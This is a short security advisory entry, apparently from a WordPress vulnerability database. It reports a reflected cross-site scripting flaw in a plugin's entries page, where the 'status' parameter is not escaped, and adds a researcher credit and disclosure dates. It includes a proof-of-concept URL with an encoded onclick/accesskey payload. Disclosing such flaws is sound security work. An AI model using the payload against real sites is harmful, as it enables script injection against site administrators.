The plugin does not escape the status parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue
The form_id needs to be a valid one https://example.com/wp-admin/admin.php?page=evf-entries&form_id=112&status=%22+type%3D%22text%22+accesskey%3DX+onclick%3Dalert%281%29+a%3D%22
JrXnm
JrXnm
Yes
2021-11-22 (about 7 months ago)
2021-11-22 (about 7 months ago)
2022-04-12 (about 2 months ago)